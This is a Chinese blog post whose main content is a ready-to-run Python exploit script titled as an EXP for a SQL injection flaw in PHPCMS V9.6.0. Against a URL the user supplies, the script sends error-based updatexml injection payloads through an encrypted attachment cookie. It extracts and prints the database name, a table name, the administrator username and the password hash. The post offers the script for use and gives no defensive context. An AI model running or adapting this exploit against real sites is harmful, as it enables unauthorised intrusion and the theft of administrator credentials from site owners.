• PHPCMS V9.6.0 SQL注入漏洞EXP


    运行于python3.5

    import requests
    import time
    import re
    import sys
    
    def banner():
    	msg = '''--------------EXP IS PHPCMS V9.6.0---------------'''
    	print(msg)
    def get_encrypt_value(payload,url):
    	url_com = url + payload
    	url_1 = "{}/index.php?m=wap&a=index&siteid=1".format(url)
    	cookies = requests.get(url_1).cookies
    	for c in cookies:
    		if c.name[-7:]=='_siteid':
    			cookie_head=c.name[:6]
    			cookies[cookie_head + '_userid']=c.value
    			cookies[c.name]=c.value
    			break
    	encrypt_cookie = requests.get(url_com,cookies=cookies).cookies
    	for c in encrypt_cookie:
    		if c.name[-9:] == '_att_json':
    			encrypt_data = c.value
    			break
    	return get_data(url,encrypt_data)
    def get_data(url,data):
    	url = "{}/index.php?m=content&c=down&a_k={}".format(url,data)
    	rsp = requests.get(url)
    	cc = re.findall(r"XPATH syntax error: '~(.*?)~' <br />",rsp.text)
    	return cc
    def get_payload(url):
    	data = []
    	try:
    		payload_db_name = {"db_name":"/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id=1%*27%*20and%*20updatexml%281%2Cconcat%280x7e%2C%28select%*20database%28%29%29%2C0x7e%29%2C1%29%23%26m%3D1%26modelid%3D1%26f%3D1%26catid%3D1"}
    		db_name = get_encrypt_value(payload_db_name.get('db_name'),url)
    		db_name = db_name[0]
    		data.append(db_name)
    	except:
    		str = "***"
    		data.append(str)
    	try:
    		payload_table_name = {"table_name":"/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id=1%*27%*20and%*20updatexml%281%2Cconcat%280x7e%2C%28select%*20table_name%*20from%*20information_schema.tables%*20where%*20table_schema%3D%*27"+db_name+"%*27%*20limit%*200%2C1%29%2C0x7e%29%2C1%29%23%26m%3D1%26modelid%3D1%26f%3D1%26catid%3D1"}
    		table_name = get_encrypt_value(payload_table_name.get('table_name'),url)
    		table_name = table_name[0]
    		data.append(table_name)
    	except:
    		str = "***"
    		data.append(str)
    	try:
    		payload_admin_name = {"admin_name":"/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id=1%*27%*20and%*20updatexml%281%2Cconcat%280x7e%2C%28select%*20mid%28%28SELECT%*20username%*20from%*20"+table_name+"%*20limit%*200%2C1%29%2C1%2C16%29%29%2C0x7e%29%2C1%29%23%26m%3D1%26modelid%3D1%26f%3D1%26catid%3D1"}
    		admin_name = get_encrypt_value(payload_admin_name.get('admin_name'),url)
    		admin_name = admin_name[0]
    		data.append(admin_name)
    	except:
    		str = "***"
    		data.append(str)
    	try:
    		payload_pass_s16 = {"pass_s16":"/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id=1%*27%*20and%*20updatexml%281%2Cconcat%280x7e%2C%28select%*20mid%28%28SELECT%*20password%*20from%*20"+table_name+"%*20limit%*200%2C1%29%2C1%2C16%29%29%2C0x7e%29%2C1%29%23%26m%3D1%26modelid%3D1%26f%3D1%26catid%3D1"}
    		pass_s16 = get_encrypt_value(payload_pass_s16.get('pass_s16'),url)
    		pass_s16 = pass_s16[0]
    	except:
    		pass
    	try:
    		payload_pass_x16 = {"pass_x16":"/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id=1%*27%*20and%*20updatexml%281%2Cconcat%280x7e%2C%28select%*20mid%28%28SELECT%*20password%*20from%*20"+table_name+"%*20limit%*200%2C1%29%2C16%2C20%29%29%2C0x7e%29%2C1%29%23%26m%3D1%26modelid%3D1%26f%3D1%26catid%3D1"}
    		pass_x16 = get_encrypt_value(payload_pass_x16.get('pass_x16'),url)
    		pass_x16 = pass_x16[0]
    		password = pass_s16 + pass_x16
    		data.append(password)
    	except:
    		str = "***"
    		data.append(str)
    	output_data(data)
    def output_data(data):
    	output = '''
    		database name is : {0}
    		table name is : {1}
    		admin username is : {2}
    		admin password is : {3}
    	'''.format(data[0],data[1],data[2],data[3])
    	print(output)
    def get_url():
    	url = input("Please input url:")
    	if ("http://"in url) or ("https://" is url):
    		return url
    	else:
    		print("Warning: Please input http:// or https:// ! try again !")
    def main():
    	banner()
    	url = get_url()
    	print("[*] target:{}".format(url))
    	get_payload(url)
    	print("[*] shutting down at {0}".format(time.strftime("%X")))
    if __name__ == '__main__':
    	main()
    

      

  • 相关阅读:
    day01-h1字体大小和文本居中
    js正则表达式中的
    js滚动分页原理
    在web.xml中设置全局编码
    C# 导出word 表格代码
    C# 创建单例
    Winform 异步调用2 时间
    Winform 异步调用
    c#中跨线程调用windows窗体控件
    C# 中的委托和事件
  • 原文地址:https://www.cnblogs.com/Spec/p/10844822.html
Copyright © 2020-2023  润新知